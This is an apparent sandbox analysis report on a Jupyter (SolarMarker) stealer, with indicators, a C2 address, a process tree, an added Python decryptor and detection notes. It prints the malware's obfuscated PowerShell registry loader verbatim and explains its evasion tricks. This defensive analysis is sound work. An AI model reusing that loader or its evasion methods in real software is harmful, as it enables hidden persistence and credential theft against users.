Analysis
max time kernel: 138s
max time network: 298s
platform: windows10_x64
resource: win10-20220414-en
submitted: 13-06-2022 00:01
Static task: static1
General
Target: ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe
Size: 210.1MB
MD5: 1562c0e1c4a24abeff34aaa388a4aa53
SHA1: 67934a51c548fd77787cc26fa9952a8cd302970b
SHA256: ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab
SHA512: f3e5d23f2454fbe33d337ec4ca5dce81c8638c9d5cf2057db789991ced11888087f8a3da0d5fb0869d38957d6fd60984244065e095137f5a67cf070e8f5e6edb
Malware Config
Extracted
Family: jupyter
C2: http://37.120.247.120
Signatures
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Blocklisted process makes network request (1 IoC)
Processes:
flow 6: PID 4040 powershell.exe
Drops startup file (1 IoC)
Processes:
File created by powershell.exe: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QhGywHLreAszXutEwsWWihf.lnk
Program crash (1 IoC)
Processes:
PID 348 WerFault.exe, target PID 2932 ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe
Modifies registry class (7 IoCs)
Processes (all writes by powershell.exe):
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open
Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('9Qw7HmyNbXwDhTl1BCWQ9HiCHVJ6biS29AI3joRqFsE=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\pVbWJYZDDCSHJ\\YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[WMjltFazGzRYICFIoq5XoJDM1T0sO959lZpC3tdMx9r6rF4.aOQnwFCqXLWVnkObggxLLxB9CQD8t3NAI8E_o_VOjfEb3SskE3Fab05w_MOsLyIbBovKJMjkKSlk9pTjBqWv]::RRye6ZIFpv7n8DDuAo9IugHH9lFCZ();\""
Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa
Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa\ = "znmroizkuvzkfkiogetiwusss"

What these seven writes build: the random extension .kqcacctwwyodcobshuyiiwjvagpa is bound to the random ProgID znmroizkuvzkfkiogetiwusss, and that ProgID's shell\open\command runs PowerShell. The command hides its own console via a ShowWindowAsync P/Invoke stub (the .ToUpper()/.ToLower() string assembly only exists to defeat naive keyword matching on "DllImport" and "ShowWindowAsync"), reads the base64 text of the dropped file YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA, decodes it, uses the first 16 bytes as the IV and the rest as ciphertext, decrypts with the hard-coded 32-byte key (AES-256 in CBC mode with PKCS7 padding, the AesCryptoServiceProvider defaults), and loads the plaintext as a .NET assembly in memory before calling the named static method. Opening any file with that extension therefore relaunches the payload without a decrypted PE ever touching disk; the key, the payload path and the entry point are all recoverable from this single registry value.
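The loader parameters in the registry value above can be pulled out mechanically and used to decrypt the dropped file offline. The Python below is an added example written for this report, not code from the sample or from the sandbox. It assumes the report renders registry strings with JSON-style escaping (\" and \\), embeds the crypto/loader tail of the recorded command as a constructed sample (the ShowWindowAsync prologue is left out), and uses pyca/cryptography only inside decrypt_payload, the one step that needs the real dropped file. SAMPLE_PAYLOAD_B64 is a constructed blob, not the sample's payload.

```python
"""Recover the AES key, payload path and entry point from the Jupyter/SolarMarker
loader command in the report's "Modifies registry class" IoC. Added example; it
assumes the report escapes registry strings JSON-style and that the dropped file
is base64 text whose decoded form is IV(16) || AES-CBC ciphertext (as the command
itself shows)."""
import base64
import re
from dataclasses import dataclass
from typing import Tuple

# Constructed sample: the crypto/loader tail of the Set value (str) IoC, copied
# from the report. The Add-Type window-hiding prologue is omitted.
REPORT_VALUE = (
    r'"powershell -command \"'
    r"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;"
    r"$AC.Key=[Convert]::FromBase64String('9Qw7HmyNbXwDhTl1BCWQ9HiCHVJ6biS29AI3joRqFsE=');"
    r"$EB=[Convert]::FromBase64String([IO.File]::ReadAllText("
    r"'C:\\Users\\Admin\\AppData\\Local\\Temp\\pVbWJYZDDCSHJ\\YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA'));"
    r"$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();"
    r"$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();"
    r"[Reflection.Assembly]::Load($UB);"
    r"[WMjltFazGzRYICFIoq5XoJDM1T0sO959lZpC3tdMx9r6rF4."
    r"aOQnwFCqXLWVnkObggxLLxB9CQD8t3NAI8E_o_VOjfEb3SskE3Fab05w_MOsLyIbBovKJMjkKSlk9pTjBqWv]"
    r"::RRye6ZIFpv7n8DDuAo9IugHH9lFCZ();"
    r'\""'
)

# Constructed stand-in for the dropped file: IV bytes 00..0f followed by 32 'A's.
SAMPLE_PAYLOAD_B64 = "AAECAwQFBgcICQoLDA0OD0FB" + "QUFB" * 10


@dataclass
class LoaderConfig:
    aes_key: bytes
    payload_path: str
    entry_type: str
    entry_method: str


def unescape_report_string(value: str) -> str:
    """Undo the JSON-style escaping the report applies to registry string values."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return value.replace('\\"', '"').replace('\\\\', '\\')


KEY_RE = re.compile(r"\$AC\.Key=\[Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)")
PATH_RE = re.compile(r"ReadAllText\('([^']+)'\)")
# The final [Namespace.Type]::Method(); call is the entry point into the loaded assembly.
ENTRY_RE = re.compile(r"\[([A-Za-z0-9_.]+)\]::([A-Za-z0-9_]+)\(\);")


def parse_loader_command(report_value: str) -> LoaderConfig:
    """Extract key, payload path and entry point from the recorded shell\\open\\command."""
    cmd = unescape_report_string(report_value)
    key_m, path_m, entry_m = KEY_RE.search(cmd), PATH_RE.search(cmd), ENTRY_RE.search(cmd)
    if not (key_m and path_m and entry_m):
        raise ValueError("command does not match the expected loader layout")
    key = base64.b64decode(key_m.group(1))
    if len(key) not in (16, 24, 32):
        raise ValueError(f"unexpected AES key length {len(key)}")
    return LoaderConfig(key, path_m.group(1), entry_m.group(1), entry_m.group(2))


def split_payload(payload_text: str) -> Tuple[bytes, bytes]:
    """Decode the base64 file body; the loader takes bytes 0..15 as IV, the rest as ciphertext."""
    blob = base64.b64decode(payload_text)
    if len(blob) < 32 or (len(blob) - 16) % 16:
        raise ValueError("payload is not IV + whole AES blocks")
    return blob[:16], blob[16:]


def decrypt_payload(cfg: LoaderConfig, payload_text: str) -> bytes:
    """Replicate AesCryptoServiceProvider defaults (CBC, PKCS7) with pyca/cryptography."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    iv, ct = split_payload(payload_text)
    dec = Cipher(algorithms.AES(cfg.aes_key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def is_suspicious_open_command(cmd: str) -> bool:
    """Hunting check for HKCU\\Software\\Classes handlers: a shell\\open\\command that
    starts powershell and loads an assembly from memory has no legitimate reason to exist."""
    c = cmd.lower()
    return "powershell" in c and "reflection.assembly" in c and "::load(" in c


if __name__ == "__main__":
    cfg = parse_loader_command(REPORT_VALUE)
    print(f"AES key bits : {len(cfg.aes_key) * 8}")
    print(f"payload path : {cfg.payload_path}")
    print(f"entry point  : [{cfg.entry_type}]::{cfg.entry_method}()")
    print(f"flagged      : {is_suspicious_open_command(unescape_report_string(REPORT_VALUE))}")
```

To recover the real second stage from a sandbox or a live host, feed the contents of the file at cfg.payload_path to decrypt_payload(cfg, text); the result should start with the MZ header of a .NET assembly, which can then be opened in a .NET decompiler. The is_suspicious_open_command check is worth running over every HKCU Classes\*\shell\open\command value on a fleet: the ProgID and extension names are random per infection, but the PowerShell-plus-Assembly.Load shape is constant.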
Suspicious behavior: EnumeratesProcesses (12 IoCs)
Processes:
PID 4040 powershell.exe (9 events)
PID 4368 powershell.exe (3 events)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
Token: SeDebugPrivilege, PID 4040 powershell.exe
Token: SeDebugPrivilege, PID 4368 powershell.exe
Suspicious use of WriteProcessMemory (8 IoCs; each pair is recorded twice)
Processes:
PID 2932 ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe wrote to memory of PID 4040 powershell.exe
PID 4040 powershell.exe wrote to memory of PID 4340 csc.exe
PID 4340 csc.exe wrote to memory of PID 3708 cvtres.exe
PID 2932 ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe wrote to memory of PID 4368 powershell.exe
Processes
1. C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"
   PID: 2932
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell"
      PID: 4040
      - Blocklisted process makes network request
      - Drops startup file
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
         Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline"
         PID: 4340
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp" "c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP"
            PID: 3708
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell"
      PID: 4368
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\system32\WerFault.exe
      Command line: C:\Windows\system32\WerFault.exe -u -p 2932 -s 944
      PID: 348
      - Program crash

Note that the sample launches powershell.exe with no arguments ("powershell") and feeds the script over the child's stdin, which is why the command line carries nothing to alert on; the real content is only visible through script block logging or the registry and file writes above. The csc.exe and cvtres.exe children of PID 4040 are the C# compilation that Add-Type -MemberDefinition performs for the ShowWindowAsync P/Invoke stub, so a csc.exe spawned by an argument-less powershell.exe is itself a usable detection signal. WerFault.exe handling the crash of the parent (PID 2932) shows the 210 MB dropper did not exit cleanly after spawning its two PowerShell children.
Network
MITRE ATT&CK Matrix
Downloads

Filesize: 50KB
MD5: 2143b379fed61ab5450bab1a751798ce
SHA1: 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256: a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512: 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Filesize: 1KB
MD5: 7323216a4b3cb72a8e4b9e18769a63d7
SHA1: e35e0b917b06e1bc586d031a5e27cdec42db5c17
SHA256: 1fd38a3bedb9b5e4337d8834eb2d1cfd87618959b92898accd49241b737bc900
SHA512: 54ae2c3fa700a400973cc3ad437bfa4c359dccddfcf9012921bc598dde0aa513f44047793018fc75e3159dbfb5a171a6a2f40a6a39dfbc44e69800a8eed2eaab

Filesize: 3KB
MD5: e2fc3e1ad6b1857e10377afba34315a2
SHA1: b8b239cb809359e0d9893fe993cbf5fe3076cd91
SHA256: f8c6fb96d781568e280d1c524b63a1932d7abbec6fc8558f6b2959ba360758dd
SHA512: 7adc76e3c25c01c4786433f9d76c4b4876165ca455192847077e673c90731d9b741d87962961b7c31f72dd2afdb7729b743143968b90f171d48cdedb8c2848a3

Filesize: 652B
MD5: 1c11d3ae5fd77a79312b6c30d0a66553
SHA1: 96bf5d3745727569a87594103400b107da643152
SHA256: 9956ebc42062cb7aa5317cb483dc43b4ae186ccb41cd7b57a7ef22b0abe9a7d9
SHA512: bc137488d97f6bfe6cbd5107c23d3b497e0b2618c5a78b8c4eb3f0946cb13dcbc516b869446710e8f25be5cad2d0c319302d7edf2d5f4b171ac12ef436ccb239

Filesize: 236B
MD5: 2f9b4948ac0b26204994e246094a9f5d
SHA1: 9870e53ad61eba593a2074d2a30202f7e3df09f7
SHA256: def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776
SHA512: ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1

Filesize: 369B
MD5: 1eeb07bec0c50ea3fde3eb7ebbf2696c
SHA1: 9ab2dc69969b2b3567978960338ed5fb4bbdba06
SHA256: 377c3d45039c7df67f3e1779059c0aceb6be66e4a97c745e956840d005fe16b4
SHA512: f0bcd40d1bfc147c367dd8660f95780c4cae5df7f85fb161270e70029d9e4e9f4c3fa4f826cd286ce366361f41d755f28781d10a3a3300166cd8bc286b10c626